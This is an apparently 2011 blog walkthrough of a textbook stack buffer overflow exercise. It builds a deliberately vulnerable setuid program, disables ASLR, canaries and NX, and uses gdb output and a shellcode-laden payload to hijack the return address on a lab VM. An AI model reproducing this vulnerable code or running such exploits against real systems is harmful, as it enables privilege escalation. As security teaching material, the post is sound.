Errata and Notes for ShellCoder's Handbook: 2011

Chapter 2 presents a simple C program that contains a buffer overflow, victim.c:

#include <string.h>
int main(int argc, char *argv[]) {
  char little_array[512];
  if (argc > 1)
    strcpy(little_array, argv[1]);
}

The chapter then presents a series of approaches to exploiting this program. We'll start with the first approach, which is one of the most basic and fundamental approaches you can take against an unrestricted stack buffer: a payload containing shellcode, followed by the address of the shellcode one or more times. Repeating the address of the shellcode is just a fudge factor; technically, we only need it once in order to overwrite the return address, but we have to fill our buffer with SOMETHING, and it may as well be the address of our shellcode. We could just as easily substitute NOPs or any other junk data, as long as it contains no null bytes (\x00), which would terminate the strcpy() prematurely. In some cases, repeating the target address gives you more leeway when the exact location of the memory you want to overwrite is unpredictable.

There are a number of obstacles to overcome to get this basic exploit working. First, you need to decide which platform (Linux version, compiler, etc.) you want to exploit it on. You can certainly use an older operating system (like this version of Debian, which is based on the Linux version used in the book), and this will reduce the number of extra steps you'll have to take beyond what the book describes. Personally, I prefer to have the amenities of a modern version of Linux, and also to get a sense of what changes have been made to Linux and gcc to thwart such attacks. This also tells me which exploit mitigations I need to learn to defeat in order to get my exploits working on current platforms. I use a default installation of Ubuntu Desktop 10.10 for this purpose.

Since I've opted to use modern versions of Linux and gcc, there are a bunch of exploit mitigation technologies that I need to either circumvent or turn off in order to get this attack working. Since we're still early in the book, let's start by just turning them off. These technologies include:

1. ASLR -- Address space layout randomization randomizes the locations of memory segments, which makes it difficult to find the address of the buffer we're overflowing, and thus difficult to find our shellcode in memory when we try to jump to it. This is a system-wide setting in Linux. I disable it with a short shell script (aslroff.sh):

#!/bin/sh
echo 0 > /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space

I make it executable and invoke it with:

$ chmod +x aslroff.sh
$ sudo ./aslroff.sh

The default value in Ubuntu 10.10 is "2" (full randomization); "0" turns ASLR off.

2. Stack cookies -- A stack cookie (or "canary") is an unpredictable value placed on the stack between our buffer and the return address we want to overwrite. Before a protected function returns, compiler-inserted code checks whether the canary still holds its original value; if it doesn't, the program calls __stack_chk_fail() and is terminated before we get to jump to our overwritten return address. This is a per-program, compiler-level protection that Ubuntu's gcc enables by default. It can be disabled by compiling our victim program with the gcc switch "-fno-stack-protector".

3. DEP or NX -- This mitigation stops a program from executing code located on the stack. Most programs never need to execute code from the stack, so the toolchain marks them (via the PT_GNU_STACK program header in the binary) as needing only a non-executable stack. A convenient utility for changing this marking is "execstack". execstack is not installed by default on my copy of Ubuntu, so I had to install it with "sudo apt-get install execstack". Once we've compiled our program, we can remove this default protection by running:

$ execstack -s ./victim

The book suggests that we want to get a root shell (we'll see that there's a problem with this down the road), so taking all of this into account, the commands to build the victim look something like:

$ sudo gcc -fno-stack-protector -mpreferred-stack-boundary=2 -o victim victim.c
$ sudo execstack -s victim
$ sudo chown root victim
$ sudo chmod +s victim

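Hooray! Now we have a setuid-root victim program with no DEP, ASLR, or stack canaries. (The -mpreferred-stack-boundary=2 switch tells gcc to keep the stack aligned to 4 bytes rather than its default of 16, so main() doesn't realign the stack and add padding to its frame.)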

attack.c is written to make it easy to change the length of the payload and to adjust our guesstimate of where our buffer starts. With this first approach, we don't have the luxury of a NOP sled, so we need the exact address of our shellcode in memory. The book is deliberately vague at this point about how to determine the proper payload length and memory offset; it hasn't yet discussed in depth how to reverse target programs to obtain these values. The tedium of blindly guessing them illustrates the value of a NOP sled. However, if you already have some familiarity with basic gdb commands, you can easily determine these values with a little reverse engineering and pass them as arguments to attack.c to generate a working payload.

For attack.c, you will have to make the modification mentioned in bNull's previous post for it to generate anything at all; be sure to place the malloc() AFTER you read in the command-line args. Once you've made that fix, we want to determine 1) how much data we need to write onto the stack in order to overwrite main()'s return address, and 2) where our shellcode is in memory, so we can jump (technically, RET) to it.

Let's go ahead and load our victim program into gdb:

$ gdb -q ./victim

To figure out how long our payload needs to be, we need to find two things: a) where the buffer we're overflowing starts, and b) where the return address (RA) we're trying to overwrite is stored. Since the vulnerable strcpy() occurs in main(), we're looking to overwrite the RA used by the RET in main(). Let's disassemble main() with "disas main":

NOTE: YOUR SYSTEM MAY AND PROBABLY WILL DIFFER FROM MINE, SO FOLLOW ALONG ON YOUR OWN SYSTEM AND USE THE ADDRESSES THAT IT GENERATES, RATHER THAN THE ONES YOU SEE HERE.

(gdb) disas main
Dump of assembler code for function main:
   0x080483c4 <+0>:    push   %ebp
   0x080483c5 <+1>:    mov    %esp,%ebp
   0x080483c7 <+3>:    sub    $0x208,%esp
   0x080483cd <+9>:    cmpl   $0x1,0x8(%ebp)
   0x080483d1 <+13>:    jle    0x80483ed <main+41>
   0x080483d3 <+15>:    mov    0xc(%ebp),%eax
   0x080483d6 <+18>:    add    $0x4,%eax
   0x080483d9 <+21>:    mov    (%eax),%eax
   0x080483db <+23>:    mov    %eax,0x4(%esp)
   0x080483df <+27>:    lea    -0x200(%ebp),%eax
   0x080483e5 <+33>:    mov    %eax,(%esp)
   0x080483e8 <+36>:    call   0x80482f4 <strcpy@plt>
   0x080483ed <+41>:    leave
   0x080483ee <+42>:    ret
End of assembler dump.

Based on our (presumed) understanding of how the stack works, we know that the RET instruction at 0x080483ee will pop the return address off the stack (from the location ESP points to) and jump to it. If we set a breakpoint at that instruction and look at the value of ESP, that will tell us exactly where in the stack segment the return address lies; since we have ASLR disabled, it should be the same address from run to run, as long as nothing else about how the program is started changes.

(gdb) break *0x080483ee
Breakpoint 1 at 0x80483ee
(gdb) run putwhateverhere
Starting program: /home/kjw/shellcoders-handbook/victim putwhateverhere
Breakpoint 1, 0x080483ee in main ()

Note: We have to prefix the address with an asterisk (*) to tell gdb that it's a memory address, rather than a C function called "0x080483ee()". Then we run the program, giving it some junk text as a parameter so that it passes the "if (argc > 1)" check. As we hoped, the program stopped right before executing the RET instruction. Now, if we look at the top of the stack:

(gdb) x/xw $esp
0xbffffbcc:    0x00155ce7
(gdb) disas 0x00155ce7
Dump of assembler code for function __libc_start_main:
0x00155c00 <+0>:    push   %ebp
0x00155c01 <+1>:    mov    %esp,%ebp
...

We can see that the value ESP points to, 0x00155ce7, is an address inside a function called "__libc_start_main" (at offset +231, since 0x155ce7 - 0x155c00 = 0xe7). This function runs before main() and is what actually calls main(), so naturally that's where we return to when main() returns. We can also see that the RA we want to overwrite is stored on the stack at 0xbffffbcc. With ASLR disabled on Ubuntu 10.10, addresses near the top of the stack tend to start with "0xbffff".

Now we need to find out where the buffer starts on the stack. There are lots of ways to figure this out, but to keep things simple, let's just restart the program with an input to the buffer that will be easy to recognize in memory, and stick with the same breakpoint at RET in main(). I like to use a bunch of "A"s, the ASCII code of which is 0x41 in hex.

(gdb) run AAAAAAAAAAAAAAAAAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/kjw/shellcoders-handbook/victim AAAAAAAAAAAAAAAAAA

Breakpoint 1, 0x080483ee in main ()

So again, ESP points at main()'s return address. The RA was pushed onto the stack when __libc_start_main called main(), so our target buffer must have been created after it, further down the stack. Since the stack grows toward lower addresses, our buffer will be at a lower address than the one ESP currently points to. Memory will look something like:

lower address e.g. 0x00000000
/\

[target buffer, 512 bytes]
[some other stuff, possibly]
[return address]

\/
higher address e.g. 0xffffffff

It's certainly possible that our buffer could have been overwritten or otherwise mangled by the time execution reaches the RET instruction, but since there's not much going on in our program, it will still be sitting in memory where strcpy() put it; only the stack pointer has moved since then. We don't know exactly where it starts, but we know it will be at least 512 bytes below the RA, since that's the size of the buffer. So we'll start looking a little further down than that, at an offset that is a multiple of 4 bytes to stay aligned with the stack; here, 20 words starting 532 bytes below ESP.

(gdb) x/20xw $esp-532
0xbffff9b8:    0xbffffbc8    0x080483ed    0xbffff9c8    0xbffffdce
0xbffff9c8:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff9d8:    0x00004141    0x00000001    0x0012cff4    0x00000000
0xbffff9e8:    0xbffffa94    0x0011b0df    0x0012dad0    0x00130d78
0xbffff9f8:    0x00000001    0x00000001    0x00000000    0x0011caca

Hey, look! We have a bunch of 0x41's in a row, starting at address 0xbffff9c8 on the stack. That must be the many consecutive "A" characters that we passed to the program as an argument. Now we need to figure out the distance between the beginning of the buffer and the return address that we want to overwrite, so we know how long the payload needs to be.

(gdb) p 0xbffffbcc - 0xbffff9c8
$1 = 516

We actually need to add 4 to this value: 516 is the distance from the start of the buffer to the first byte of the RA, and the RA itself is another 4 bytes. If you're already a bit familiar with reversing, 520 is exactly what you would expect if the compiler isn't putting any extra padding on the stack: 512 bytes for the buffer, a 4-byte saved frame pointer (SFP), and a 4-byte return address.

We now have almost everything we need to get our attack working in gdb. We know where our shellcode starts on the stack: at the beginning of the buffer, 0xbffff9c8. We also know how long our payload needs to be in order to overwrite the return address: 520 bytes. That second value has to be tweaked slightly because of the way attack.c is written: we add 4 to account for the "BUF=" string that attack.c puts at the beginning of the buffer, and 1 more so that the terminating null character doesn't overwrite part of our target address. The final buffer length argument is therefore 525. To make attack.c aim at 0xbffff9c8, we need to relate that address to the guess that attack.c computes. We can figure this out by first running it with an offset argument of 0:

kjw@ubuntu-vm0:~/shellcoders-handbook$ ./attack 525 0
Attempting address: 0xbffffbd8

With an offset of 0, the program builds a payload that guesses the shellcode can be found at 0xbffffbd8. Wrong! Where in attack.c is the offset argument used to change that guess?

addr = find_start() - offset;

OK, so if the offset is zero, addr = find_start() - 0 = 0xbffffbd8. We want addr to be 0xbffff9c8, so the offset we need is the difference between the two:

offset = 0xbffffbd8 - 0xbffff9c8

Let's find the right offset to use:

kjw@ubuntu-vm0:~/shellcoders-handbook$ gdb -q
(gdb) p 0xbffffbd8 - 0xbffff9c8
$1 = 528

Alright, so if we use a bsize argument of 525 and an offset argument of 528, our exploit should work. Let's try it in gdb. First, let's exit the shell that was started by running "attack" last time.

kjw@ubuntu-vm0:~/shellcoders-handbook$ exit
exit
kjw@ubuntu-vm0:~/shellcoders-handbook$ ./attack 525 528
Attempting address: 0xbffff9c8
kjw@ubuntu-vm0:~/shellcoders-handbook$ gdb -q ./victim
Reading symbols from /home/kjw/shellcoders-handbook/victim...(no debugging symbols found)...done.
(gdb) run $BUF
Starting program: /home/kjw/shellcoders-handbook/victim $BUF

Program received signal SIGSEGV, Segmentation fault.
0xbffff9c8 in ?? ()

Oops. The program crashed, and no shell. gdb tells us that it crashed while executing at our target address, 0xbffff9c8, so main() did return where we told it to, but whatever is there isn't our shellcode. Let's look at the stack right before the RET instruction is executed.

(gdb) b *0x080483ee
Breakpoint 1 at 0x80483ee
(gdb) run $BUF
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/kjw/shellcoders-handbook/victim $BUF

Breakpoint 1, 0x080483ee in main ()
(gdb) x/x $esp
0xbffff27c:    0xbffff9c8
(gdb) x/x 0xbffff9c8
0xbffff9c8:    0x67733a31
(gdb) x/20x $esp-532
0xbffff068:    0xbffff278    0x080483ed    0xbffff078    0xbffff49a
0xbffff078:    0x315e1aeb    0x074688c0    0x5e891e8d    0x0c468908
0xbffff088:    0xf3890bb0    0x8d084e8d    0x80cd0c56    0xffffe1e8
0xbffff098:    0x69622fff    0x68732f6e    0xbffff9c8    0xbffff9c8
0xbffff0a8:    0xbffff9c8    0xbffff9c8    0xbffff9c8    0xbffff9c8

This doesn't look like the start of our shellcode: we were looking for 0x315e1aeb but found 0x67733a31. And there's something else strange here. When we first located the start of the buffer, it was at 0xbffff9c8; now our shellcode starts at 0xbffff078 (and ESP at the RET has moved from 0xbffffbcc to 0xbffff27c). The stack has moved, even though we disabled ASLR. What changed? Instead of passing victim a short junk string, we now pass it the full payload, and before that we ran attack, which stores the payload in an environment variable with "putenv(buff)" and then spawns a new shell with "system("/bin/bash -p")". The argument and environment strings are copied to the top of the stack when a program starts, so the longer argv[1], the new BUF variable, and any other differences in the new shell's environment all push main()'s frame to lower addresses.

So, if we are going to use this approach of storing our payload in an environment variable and spawning a new shell with it, we either need to predict exactly how this will affect the stack, or we need an iterative process to find the correct values for our offset and payload size. Let's see if we can get the correct values by debugging in as close to the final attack environment as possible. First, we want to make sure that we always return to the same common starting point between runs of attack; otherwise, each nested shell will move the stack around. I'm connected to an Ubuntu virtual machine via ssh, and I don't enable colors on the command line. Whenever attack spawns another shell, that shell enables colors, so I know I've returned to the common starting point when I've run exit enough times to get rid of the colors.

kjw@ubuntu-vm0:~/shellcoders-handbook$ ./attack 520 0
Attempting address: 0xbffffbd8

With an offset of 0, attack.c's guess is still 0xbffffbd8.

kjw@ubuntu-vm0:~/shellcoders-handbook$ gdb -q
(gdb) p 0xbffffbd8-0xbffff078
$1 = 2912

New offset arg to use is 2912.

Now exit back to the common bash invocation and try these new values with attack.c.

kjw@ubuntu-vm0:~/shellcoders-handbook$ exit
exit
kjw@ubuntu-vm0:~/shellcoders-handbook$ ./attack 525 2912
Attempting address: 0xbffff078
kjw@ubuntu-vm0:~/shellcoders-handbook$ gdb -q ./victim
Reading symbols from /home/kjw/shellcoders-handbook/victim...(no debugging symbols found)...done.
(gdb) run $BUF
Starting program: /home/kjw/shellcoders-handbook/victim $BUF
process 10639 is executing new program: /bin/dash
$

Success! We overwrote the return address with the address of our shellcode, and our shellcode got us root. Right?

$ whoami
kjw

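Unfortunately for us, two things stand in the way. First, we ran victim under gdb, and Linux does not honor a program's setuid bit while that program is being traced by an unprivileged debugger, so victim never had root privileges in this session. Second, even outside a debugger, bash, for one, drops privileges by default: if it starts with an effective UID that differs from its real UID and without the -p option, it resets the effective UID to the real one. (The shell our shellcode actually launched here is /bin/dash, Ubuntu's /bin/sh, as gdb's "executing new program" line shows.) To get around that, we need different shellcode that calls setuid(0) before invoking the shell; when the effective UID is already 0, setuid(0) also sets the real UID to 0, whereas seteuid() would leave the real UID unchanged. I'll hopefully be writing another blog post about how to use the Metasploit Framework to generate shellcode that can do this for us. For now, let's just try to get this non-root exploit working outside of gdb. What happens when we try to run it with the same parameters outside of gdb?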

kjw@ubuntu-vm0:~/shellcoders-handbook$ ./attack 525 2912
Attempting address: 0xbffff078
kjw@ubuntu-vm0:~/shellcoders-handbook$ ./victim $BUF
Illegal instruction

So it appears that the mere act of running the program under gdb, as opposed to directly from the shell, changes the stack and breaks our exploit. Figuring out how to adjust the offset to account for this can be a bit tricky, so I'll leave that for another blog post as well.

(Edited 4/17 with a few corrections about Linux versions from todb, for the sake of clarity.)


Sunday, April 10, 2011

Chapter 2, "Using an Exploit", pp 31-38 Continued
